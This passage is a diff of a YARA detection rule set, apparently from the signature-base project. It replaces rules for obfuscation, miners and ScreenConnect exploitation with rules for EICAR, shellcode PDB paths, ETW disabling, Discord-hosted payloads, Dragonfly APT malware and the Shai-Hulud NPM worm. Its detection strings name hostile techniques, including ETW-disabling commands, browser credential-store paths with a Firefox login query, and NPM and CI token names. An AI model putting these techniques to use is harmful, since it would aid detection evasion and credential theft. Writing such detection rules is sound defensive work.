-		hash1 = "cb7c0cf1750baaa11783e93369230ee666b9f3da7298e4d1bb9a07af6a439f2f"
-		hash2 = "799139b5278dc2ac24279cc6c3db44f4ef0ea78ee7b721b0ace38fd8018c51ac"
-		hash3 = "38ea33dab0ba2edd16ecd98cba161c550d1036b253c8666c4110d198948329fb"
+		hash1 = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
 
 	strings:
-		$x1 = "kQZ6l5t1kAlsjmBzsCZPrSpQn5tFrChLtTdsgTlOsClKt5pBsDdFrSVshnxMr6ZOpn9slndBsy1jq6lIr216rSNApn9P" fullword ascii
-		$x2 = { 00 00 00 00 00 00 00 00 00 00 00 00 21 21 21 73
-              79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 00 }
-		$x3 = "!!!url!!!" fullword ascii
-		$x4 = "h4NcbkdLrCpFpPQ=" fullword ascii
-		$x5 = "GloablCryptNv1" fullword ascii
-		$x6 = "Gloabl\\CryptNv1" fullword ascii
+		$s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them
+		uint16( 0 ) == 0x3558 and filesize < 70 and $s1 at 0
 }
-rule SIGNATURE_BASE_Sharpcat : FILE
+rule SIGNATURE_BASE_SUSP_PDB_Path_Keywords : FILE
 {
 	meta:
-		description = "Detects command shell SharpCat - file SharpCat.exe"
+		description = "Detects suspicious PDB paths"
 		author = "Florian Roth (Nextron Systems)"
-		id = "94a7ce40-ac2f-598e-86c5-ee9fde1eeef0"
-		date = "2016-06-10"
-		modified = "2023-12-05"
-		reference = "https://github.com/Cn33liz/SharpCat"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_sharpcat.yar#L8-L23"
+		id = "cbd9b331-58bb-5b29-88a2-5c19f12893a9"
+		date = "2019-10-04"
+		modified = "2025-03-21"
+		reference = "https://twitter.com/stvemillertime/status/1179832666285326337?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L367-L393"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4a38812b07b40bdde03049dbff1f9de38cadaf9941ab8b40b84016b1d5cbfd51"
-		score = 75
+		logic_hash = "274b4b40190b8f7e3d123fad63e2bb6b2114a3dbef062791d442109cac149b08"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "96dcdf68b06c3609f486f9d560661f4fec9fe329e78bd300ad3e2a9f07e332e9"
 
 	strings:
-		$x1 = "ShellZz" fullword ascii
-		$s2 = "C:\\Windows\\System32\\cmd.exe" fullword wide
-		$s3 = "currentDirectory" fullword ascii
+		$ = "Debug\\Shellcode" ascii
+		$ = "Release\\Shellcode" ascii
+		$ = "Debug\\ShellCode" ascii
+		$ = "Release\\ShellCode" ascii
+		$ = "Debug\\shellcode" ascii
+		$ = "Release\\shellcode" ascii
+		$ = "shellcode.pdb" nocase ascii
+		$ = "\\ShellcodeLauncher" ascii
+		$ = "\\ShellCodeLauncher" ascii
+		$ = "Fucker.pdb" ascii
+		$ = "\\AVFucker\\" ascii
+		$ = "ratTest.pdb" ascii
+		$ = "Debug\\CVE_" ascii
+		$ = "Release\\CVE_" ascii
+		$ = "Debug\\cve_" ascii
+		$ = "Release\\cve_" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_Base64_Encoded_Hex_Encoded_Code
+rule SIGNATURE_BASE_SUSP_Disable_ETW_Jun20_1
 {
 	meta:
-		description = "Detects hex encoded code that has been base64 encoded"
+		description = "Detects method to disable ETW in ENV vars before executing a program"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2cfd278f-ff45-5e23-b552-dad688ab303b"
-		date = "2019-04-29"
+		id = "ea5dee09-959e-5ef2-8f84-5497bdef0a05"
+		date = "2020-06-06"
 		modified = "2025-03-21"
-		reference = "https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_obfuscation.yar#L2-L17"
+		reference = "https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L395-L413"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f1451e2dd0e4e70a0f39f609331762cce369642e9fadbef83d932da2a0a6c60b"
+		logic_hash = "182ad2512bcfbcd92d13380113b32982eb367e458019f07038a12f494dfbebb6"
 		score = 65
 		quality = 85
 		tags = ""
 
 	strings:
-		$x1 = { 78 34 4e ?? ?? 63 65 44 ?? ?? 58 48 67 }
-		$x2 = { 63 45 44 ?? ?? 58 48 67 ?? ?? ?? 78 34 4e }
-		$fp1 = "Microsoft Azure Code Signp$"
+		$x1 = "set COMPlus_ETWEnabled=0" ascii wide fullword
+		$x2 = "$env:COMPlus_ETWEnabled=0" ascii wide fullword
+		$s1 = "Software\\Microsoft.NETFramework" ascii wide
+		$sa1 = "/v ETWEnabled" ascii wide fullword
+		$sa2 = " /d 0" ascii wide
+		$sb4 = "-Name ETWEnabled"
+		$sb5 = " -Value 0 "
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
+		1 of ( $x* ) or 3 of them
 }
-rule SIGNATURE_BASE_SUSP_Reversed_Base64_Encoded_EXE : FILE
+rule SIGNATURE_BASE_SUSP_PE_Discord_Attachment_Oct21_1 : FILE
 {
 	meta:
-		description = "Detects an base64 encoded executable with reversed characters"
+		description = "Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3b52e59e-7c0a-560f-8123-1099c52e7e3d"
-		date = "2020-04-06"
+		id = "7c217350-4a35-505d-950d-1bc989c14bc2"
+		date = "2021-10-12"
 		modified = "2025-03-21"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_obfuscation.yar#L62-L83"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L415-L429"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0a2f1caf2235ee24f531c9f9a5ebdc0c97a90890218669749a4c83bede80a336"
-		score = 80
+		logic_hash = "4d84ec50738f4c7aca8e77c3aabdcd77f3071733a2245a58283f070f2b220599"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8"
 
 	strings:
-		$s1 = "AEAAAAEQATpVT"
-		$s2 = "AAAAAAAAAAoVT"
-		$s3 = "AEAAAAEAAAqVT"
-		$s4 = "AEAAAAIAAQpVT"
-		$s5 = "AEAAAAMAAQqVT"
-		$sh1 = "SZk9WbgM1TEBibpBib1JHIlJGI09mbuF2Yg0WYyd2byBHIzlGaU" ascii
-		$sh2 = "LlR2btByUPREIulGIuVncgUmYgQ3bu5WYjBSbhJ3ZvJHcgMXaoR" ascii
-		$sh3 = "uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV" ascii
+		$x1 = "https://cdn.discordapp.com/attachments/" ascii wide
 
 	condition:
-		filesize < 10000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_Script_Base64_Blocks_Jun20_1
+rule SIGNATURE_BASE_SUSP_Encoded_Discord_Attachment_Oct21_1 : FILE
 {
 	meta:
-		description = "Detects suspicious file with base64 encoded payload in blocks"
+		description = "Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cef759a5-b02a-53e7-bf27-184eee6bc3fa"
-		date = "2020-06-05"
+		id = "06c086f4-8b79-5506-9e3f-b5d099106157"
+		date = "2021-10-12"
 		modified = "2025-03-21"
-		reference = "https://posts.specterops.io/covenant-v0-5-eee0507b85ba"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_obfuscation.yar#L85-L98"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L431-L456"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7d456cbbbd76f543afe144a2876a02db834aa6b09ecd4d6aa2f25ce8eeac5de8"
+		logic_hash = "1ea5a83e91b5c5b4b8a1d507c365bc1583394c97a28b7d7a576f085854676769"
 		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$sa1 = "<script language=" ascii
-		$sb2 = { 41 41 41 22 2B 0D 0A 22 41 41 41 }
+		$enc_b01 = "Y2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRz" ascii wide
+		$enc_b02 = "Nkbi5kaXNjb3JkYXBwLmNvbS9hdHRhY2htZW50c" ascii wide
+		$enc_b03 = "jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudH" ascii wide
+		$enc_b04 = "AGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABz" ascii wide
+		$enc_b05 = "BjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAc" ascii wide
+		$enc_b06 = "AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AH" ascii wide
+		$enc_h01 = "63646E2E646973636F72646170702E636F6D2F6174746163686D656E7473" ascii wide
+		$enc_h02 = "63646e2e646973636f72646170702e636f6d2f6174746163686d656e7473" ascii wide
+		$enc_r01 = "stnemhcatta/moc.ppadrocsid.ndc" ascii wide
 
 	condition:
-		all of them
+		filesize < 5000KB and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_Reversed_Hacktool_Author : FILE
+
+rule SIGNATURE_BASE_Unspecified_Malware_Sep1_A1 : FILE
 {
 	meta:
-		description = "Detects a suspicious path traversal into a Windows folder"
+		description = "Detects malware from DrqgonFly APT report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "33e20d75-af07-5df2-82c3-c48aec37a947"
-		date = "2020-06-10"
-		modified = "2025-03-21"
-		reference = "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_obfuscation.yar#L100-L114"
+		id = "cff49e85-c8c3-5240-9948-0551e38e7040"
+		date = "2017-09-12"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dragonfly.yar#L13-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3681fb11dabf9905915d23f4198145b503a260d628415fd79ad71d7703ba9f6f"
-		score = 65
+		logic_hash = "d235dc964ac74d2b635251d07b2a9119b731a6c3c45b6b2a81ca88e6fc8b63b7"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0"
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and pe.imphash ( ) == "17a4bd9c95f2898add97f309fc6f9bcd" )
+}
+rule SIGNATURE_BASE_Dragonfly_APT_Sep17_1 : FILE
+{
+	meta:
+		description = "Detects malware from DrqgonFly APT report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d219a54e-cb76-5c56-b64c-5019e811eeb1"
+		date = "2017-09-12"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dragonfly.yar#L29-L44"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "c885fb690b7e047203529f0c4a6dd60dea822ce60a47e42b52d3216bc26da62e"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fc54d8afd2ce5cb6cc53c46783bf91d0dd19de604308d536827320826bc36ed9"
 
 	strings:
-		$x1 = "iwiklitneg" fullword ascii wide
-		$x2 = " eetbus@ " ascii wide
+		$s1 = "\\Update\\Temp\\ufiles.txt" wide
+		$s2 = "%02d.%02d.%04d %02d:%02d" fullword wide
+		$s3 = "*pass*.*" fullword wide
 
 	condition:
-		filesize < 4000KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_SUSP_Base64_Encoded_Hacktool_Dev : FILE
+rule SIGNATURE_BASE_Dragonfly_APT_Sep17_2 : FILE
 {
 	meta:
-		description = "Detects a suspicious base64 encoded keyword"
+		description = "Detects malware from DrqgonFly APT report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6dc7db4b-a614-51e4-a9a5-f869154dbbb1"
-		date = "2020-06-10"
-		modified = "2025-03-21"
-		reference = "https://twitter.com/cyb3rops/status/1270626274826911744"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_obfuscation.yar#L116-L136"
+		id = "e64f121d-a628-54b5-88f3-96eea388c155"
+		date = "2017-09-12"
+		modified = "2023-01-06"
+		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dragonfly.yar#L46-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7345a528a12f87e5cbcabccf649566a038dd2115e8aec4f39599e357c8c6d57f"
-		score = 65
+		logic_hash = "433711dd15c8d1044b381046747194e47402288df06da6bbc61055dc9c90f52a"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "178348c14324bc0a3e57559a01a6ae6aa0cb4013aabbe324b51f906dcf5d537e"
 
 	strings:
-		$ = "QGdlbnRpbGtpd2" ascii wide
-		$ = "BnZW50aWxraXdp" ascii wide
-		$ = "AZ2VudGlsa2l3a" ascii wide
-		$ = "QGhhcm1qMH" ascii wide
-		$ = "BoYXJtajB5" ascii wide
-		$ = "AaGFybWowe" ascii wide
-		$ = "IEBzdWJ0ZW" ascii wide
-		$ = "BAc3VidGVl" ascii wide
-		$ = "gQHN1YnRlZ" ascii wide
+		$s1 = "\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data" wide
+		$s2 = "C:\\Users\\Public\\Log.txt" fullword wide
+		$s3 = "SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins" fullword wide
+		$s4 = "***************** Mozilla Firefox ****************" fullword wide
+		$s5 = "********************** Opera *********************" fullword wide
+		$s6 = "\\AppData\\Local\\Microsoft\\Credentials\\" wide
+		$s7 = "\\Appdata\\Local\\Google\\Chrome\\User Data\\Default\\" wide
+		$s8 = "**************** Internet Explorer ***************" fullword wide
 
 	condition:
-		filesize < 6000KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and 3 of them )
 }
-rule SIGNATURE_BASE_SUSP_LNX_SH_Cryptominer_Indicators_Dec20_1 : FILE
+
+rule SIGNATURE_BASE_Dragonfly_APT_Sep17_3 : FILE
 {
 	meta:
-		description = "Detects helper script used in a crypto miner campaign"
+		description = "Detects malware from DrqgonFly APT report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e376e0e1-1490-5ad4-8ca2-d28ca1c0b51a"
-		date = "2020-12-31"
+		id = "4eafd732-80bc-5f50-bf0d-096df4d35d61"
+		date = "2017-09-12"
 		modified = "2023-12-05"
-		reference = "https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_crypto_miner.yar#L2-L17"
+		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dragonfly.yar#L68-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4acd1b77307dbf23f95f7a2024209bee714c6931182aff16455ea6b7e4a6f287"
-		score = 65
+		logic_hash = "f564685eb1426d1a3eb888a888bfdf3a8fa9bc96af07fb0bc5f10c0a324f1d9d"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3298dbd985c341d57e3219e80839ec5028585d0b0a737c994363443f4439d7a5"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b051a5997267a5d7fa8316005124f3506574807ab2b25b037086e2e971564291"
 
 	strings:
-		$x1 = "miner running" fullword ascii
-		$x2 = "miner runing" fullword ascii
-		$x3 = " --donate-level 1 "
-		$x4 = " -o pool.minexmr.com:5555 " ascii
+		$s1 = "kernel64.dll" fullword ascii
+		$s2 = "ws2_32.dQH" fullword ascii
+		$s3 = "HGFEDCBADCBA" fullword ascii
+		$s4 = "AWAVAUATWVSU" fullword ascii
 
 	condition:
-		filesize < 20KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and ( pe.imphash ( ) == "6f03fb864ff388bac8680ac5303584be" or all of them ) )
 }
-rule SIGNATURE_BASE_PUA_WIN_XMRIG_Cryptocoin_Miner_Dec20 : FILE
+rule SIGNATURE_BASE_Dragonfly_APT_Sep17_4 : FILE
 {
 	meta:
-		description = "Detects XMRIG crypto coin miners"
+		description = "Detects malware from DrqgonFly APT report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4dfb04e9-fbba-5a6f-ad20-d805025d2d74"
-		date = "2020-12-31"
+		id = "dbc0eebf-fc81-5a0b-b2e0-129d0b40b6f7"
+		date = "2017-09-12"
 		modified = "2023-12-05"
-		reference = "https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_crypto_miner.yar#L19-L33"
+		reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dragonfly.yar#L91-L109"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c39aee669a98bcc9d07821aef248096e45a6c54ab22b8b98c0a393b445f3934e"
+		logic_hash = "61af81f0cd1eccba3a1000e6715c9715e8e67849e5edd4279728a7e47bd8cb75"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2f159b71183a69928ba8f26b76772ec504aefeac71021b012bd006162e133731"
 
 	strings:
-		$x1 = "xmrig.exe" fullword wide
-		$x2 = "xmrig.com" fullword wide
-		$x3 = "* for x86, CRYPTOGAMS" fullword ascii
+		$s1 = "screen.exe" fullword wide
+		$s2 = "PlatformInvokeUSER32" fullword ascii
+		$s3 = "GetDesktopImageF" fullword ascii
+		$s4 = "PlatformInvokeGDI32" fullword ascii
+		$s5 = "GetDesktopImage" fullword ascii
+		$s6 = "Too many arguments, going to store in current dir" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 6000KB and 2 of them or all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them )
 }
-rule SIGNATURE_BASE_MAL_APT_Operation_Shadowhammer_Malsetup : FILE
+rule SIGNATURE_BASE_MAL_JS_NPM_Supplychain_Attack_Nov25 : FILE
 {
 	meta:
-		description = "Detects a malicious file used by BARIUM group in Operation ShadowHammer"
-		author = "Florian Roth (Nextron Systems)"
-		id = "000f840a-848d-5f82-84bf-70690efbd4de"
-		date = "2019-03-25"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/operation-shadowhammer/89992/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_shadowhammer.yar#L2-L22"
+		description = "Detects malicious JavaScript worm bun_environment.js"
+		author = "Marius Benthin"
+		id = "546c840f-b351-53a5-b00b-34223a2ad021"
+		date = "2025-11-24"
+		modified = "2025-12-15"
+		reference = "https://www.aikido.dev/blog/shai-hulud-strikes-again-hitting-zapier-ensdomains"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_npm_supply_chain_nov25.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dea31e401997b0aed1753754fd572a94df308229fccdf15ae6a907dcfd59b50a"
+		hash = "62ee164b9b306250c1172583f138c9614139264f889fa99614903c12755468d0"
+		logic_hash = "b5a8da01ecb31dfa7a3921847a0fe26021b7618b1ee7a115a366b0854a4fa0a8"
 		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ac0711afee5a157d084251f3443a40965fc63c57955e3a241df866cfc7315223"
-		hash2 = "9acd43af36f2d38077258cb2ace42d6737b43be499367e90037f4605318325f8"
-		hash3 = "bca9583263f92c55ba191140668d8299ef6b760a1e940bddb0a7580ce68fef82"
-		hash4 = "c299b6dd210ab5779f3abd9d10544f9cae31cd5c6afc92c0fc16c8f43def7596"
-		hash5 = "6aedfef62e7a8ab7b8ab3ff57708a55afa1a2a6765f86d581bc99c738a68fc74"
-		hash6 = "cfbec77180bd67cceb2e17e64f8a8beec5e8875f47c41936b67a60093e07fcfd"
 
 	strings:
-		$x1 = "\\AsusShellCode\\Release" ascii
-		$x2 = "\\AsusShellCode\\Debug"
+		$sa1 = "npm publish"
+		$sa2 = "NPM_TOKEN"
+		$sa3 = "NPM_CONFIG_TOKEN"
+		$sb1 = "GITHUB_"
+		$sb2 = "GITLAB_"
+		$sb3 = "TEAMCITY_"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		filesize < 20MB and all of ( $sa* ) and 2 of ( $sb* )
 }
-rule SIGNATURE_BASE_Connectwise_Screenconnect_Authentication_Bypass_Feb_2024_Exploitation_IIS_Logs
+rule SIGNATURE_BASE_SUSP_JS_NPM_Sha1_Hulud_Nov25 : FILE
 {
 	meta:
-		description = "Detects an http request to '/SetupWizard.aspx/' with anything following it, which when found in IIS logs is a potential indicator of compromise of the 2024 ConnectWise ScreenConnect (versions prior to 23.9.8) vulnerability that allows an Authentication Bypass"
-		author = "Huntress DE&TH Team (modified by Florian Roth)"
-		id = "2886530b-e164-4c4b-b01e-950e3c40acb4"
-		date = "2024-02-20"
-		modified = "2024-02-21"
-		reference = "https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L3-L18"
+		description = "Detects suspicious indicators for Sha1 Hulud worm"
+		author = "Marius Benthin"
+		id = "81924803-f9fe-51bf-b7b3-8b174c865e59"
+		date = "2025-11-24"
+		modified = "2025-12-15"
+		reference = "https://www.aikido.dev/blog/shai-hulud-strikes-again-hitting-zapier-ensdomains"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_npm_supply_chain_nov25.yar#L24-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f6c7a3aa2ed98e754f9523c55eb035c7bc5f8aea96a6f86c729e9658d78710fb"
-		score = 75
+		hash = "62ee164b9b306250c1172583f138c9614139264f889fa99614903c12755468d0"
+		logic_hash = "95f7e657108bc63825f969baa28211c5c63746f525db5e71a486d76aaf98ba32"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = " GET /SetupWizard.aspx/" ascii
-		$s2 = " POST /SetupWizard.aspx/" ascii
-		$s3 = " PUT /SetupWizard.aspx/" ascii
-		$s4 = " HEAD /SetupWizard.aspx/" ascii
+		$x1 = "Sha1-Hulud:\\x"
+		$x2 = "SHA1HULUD\"`"
 
 	condition:
-		1 of them
+		filesize < 20MB and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_Screenconnect_User_Poc_Com_Unused_Feb24 : FILE
+rule SIGNATURE_BASE_SUSP_JS_NPM_Setupscript_Nov25 : FILE
 {
 	meta:
-		description = "Detects suspicious ScreenConnect user with poc.com email address, which is a sign of exploitation of the ConnectWise ScreenConnect (versions prior to 23.9.8) vulnerability with the POC released by WatchTower and the account wasn't actually used yet to login"
-		author = "Florian Roth"
-		id = "c57e6c6a-298f-5ff3-b76a-03127ff88699"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/blob/45e5b2f699a4d8f2d59ec3fc79a2e3c99db71882/watchtowr-vs-ConnectWise_2024-02-21.py#L53"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L20-L38"
+		description = "Detects suspicious JavaScript which exits silently and checks operating system"
+		author = "Marius Benthin"
+		id = "1058da69-a0c2-5258-a5b5-1a9995433a3a"
+		date = "2025-11-24"
+		modified = "2025-12-15"
+		reference = "https://www.aikido.dev/blog/shai-hulud-strikes-again-hitting-zapier-ensdomains"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_npm_supply_chain_nov25.yar#L41-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2433ad11ca1d9f970eb3c536a13f07e808c2a0b8b0dd625dffbe4947268ab8f5"
-		score = 65
+		hash = "a3894003ad1d293ba96d77881ccd2071446dc3f65f434669b49b3da92421901a"
+		logic_hash = "b685f642d1d62200da973aad7fd7a2d606a098b92524aaebe5e2bb45c63f3155"
+		score = 70
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$a1 = "<Users xmlns:xsi="
-		$a2 = "<CreationDate>"
-		$s1 = "@poc.com</Email>"
-		$s2 = "<LastLoginDate>0001"
+		$sa1 = "require('child_process')"
+		$sa2 = "process.platform ==="
+		$sb1 = "().catch((e"
+		$sb2 = "process.exit(0)"
 
 	condition:
-		filesize < 200KB and all of ( $a* ) and all of ( $s* )
+		filesize < 100KB and all of ( $sa* ) and $sb1 in ( filesize - 50 .. filesize ) and $sb2 in ( filesize - 30 .. filesize )
 }
-rule SIGNATURE_BASE_SUSP_Screenconnect_User_Poc_Com_Used_Feb24 : FILE
+rule SIGNATURE_BASE_MAL_NPM_Supplychain_Attack_Preinstallscript_Nov25 : FILE
 {
 	meta:
-		description = "Detects suspicious ScreenConnect user with poc.com email address, which is a sign of exploitation of the ConnectWise ScreenConnect (versions prior to 23.9.8) vulnerability with the POC released by WatchTower and the account was already used yet to login"
-		author = "Florian Roth"
-		id = "91990558-f145-5968-9722-b6815f6ad8d5"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/blob/45e5b2f699a4d8f2d59ec3fc79a2e3c99db71882/watchtowr-vs-ConnectWise_2024-02-21.py#L53"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L40-L60"
+		description = "Detects known malicious preinstall script in package.json"
+		author = "Marius Benthin"
+		id = "a94f2c7b-4d0c-54b3-8370-556f8b507759"
